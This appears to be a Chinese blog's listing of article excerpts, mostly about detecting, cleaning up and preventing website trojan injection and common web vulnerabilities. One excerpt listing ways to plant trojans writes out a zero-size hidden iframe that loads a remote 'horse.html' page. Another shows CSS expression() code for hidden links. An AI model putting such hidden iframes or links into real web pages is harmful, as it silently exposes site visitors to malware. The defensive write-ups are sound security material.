之前有收集了一些主流的隐藏链接代码，最近又发现一种相当牛X的代码，如下： 源代码： div style="position:absolute;left:expression(1-900);top:expression(3-999);"隐藏内容/a/div 这个代码中，expression后面的内容可以理解为JS代码并执行，但是仅IE支持这个属性，...

2019-05-13 07:13:07 挂马IE判定链接代码定义

目录 常见漏洞 SQL注入攻击 XSS攻击 SSRF攻击 CSRF攻击 文件上传漏洞 信息泄露 越权 设计缺陷 小结 常见漏洞 看到上图的漏洞是不是特别熟悉，如果不进行及时防御，就会产生蝴蝶效应。 往下看，可能会找到你要的答案。 SQL注入攻击 定义 SQL注入攻击是通过WEB表单提交，...

2019-04-30 23:43:35 身份证信息泄露Web安全危险网站开发平台PS2345安全漏洞CSRF攻击防御

dedecms被批量挂马后如何处理？假如数据有天天备份的话，那还好说，可以恢复下数据。可是又有几个站长能做到天天备份的呢？ dedecms的5.5版本有严重的安全漏洞，我因为比较懒惰，一直没打程序补丁，导致梦网美国主机站被入侵挂马，更郁闷的是，我是每过一周左右进行一...

2019-03-13 23:57:44 dedecms挂马

站长朋友们好不容易建个站点，很辛苦！被黑了的确很头疼。。被挂上了大马，更是不小的损失。可是在骂黑客的同时有没有想想自己的原因呢。我下面要讲的就是站长自己问题，也许有些话不中听，忠言逆耳，不想看就跳过去。。 大形势呢，目前一些90后的小黑客还是比较多的，...

2019-03-12 08:32:45 挂马网站被黑

网站被挂马一直是被广大站长所痛恶，又感到困扰的一件事，下面我把一些快速查找木马的方法分享给大家。 虚拟主机站长 上传源码后一段时间后发现网站被挂马，怎样快速查找锁定木马呢？ 首先我们要知道一般cms工作的时候其文件时不会改变的（数据库，生成html文件的文件...

2019-03-12 08:31:50 挂马清除木马

如果别人发给你一个类似这样的连接 你会点击么 http://www.###.com/1.txt 那我相信肯定N多人都会打开的 认为这不就是一个TXT文件吗 有什么好怕的 如果你这样想的那你就错了 那么现在请看我的一个演示 地址 ： http://www.hackv.com/wenjian.txt （PS：放心 无毒） 黑客...

2019-03-11 10:04:58 站长警惕挂马

1.网站内容没更新。 这种是最基本的了，很多企业站，或者少页面站内容很少，蜘蛛一次来是这个样子，二次来还是这个样子，久了就不来了。百度快照就会停留在一个时间上。这在以前很普遍。但是通常不大影响排名。 2.采集内容过多，网站添加内容重复。 采集软件的普及让做...

2019-03-11 09:57:07 网站服务器cms建站自助建站网赚站长新站网站结构备案网站内容

1、挂马的N种方法 (1) HTML挂马法。 常规的HTML挂马方法一般是在网页中插入一条iframe语句，像iframe src=http://www.zw361.com/horse.html width=0 height=0/iframe。查看站点是否被挂，一般是查找一下关键词iframe。 (2) 再隐藏一点的就是js挂马了。 像再原来的网页...

2019-03-10 12:08:45 挂马挂马者方法技巧

我想，很多站长都有网站被批量挂马的痛苦经历，轻者，替换，重则重装服务器，但是客户的流失是没法挽回的，如何在第一时间或前期做 好充分的准备呢。 按我的网站被挂经验和大家共享一下。很多站长，一觉醒来，网站各个页面全部被挂马，手忙脚乱，经过几次以后，偶发现...

2019-03-10 12:04:47 挂马

最近实在头疼，我的网站www.haorx.com，反复被一个www.17aq.com的网站挂马，一打开网站后，马上就会要你安装一个什么软件，我打开17aq的网站，准备查一下联系方式，告诉人家别在我的网站上挂马。但人家根本就没有页面，显然是一个挂马的网站，怎么办（请各位看官给我支...

2019-03-10 12:03:40 挂马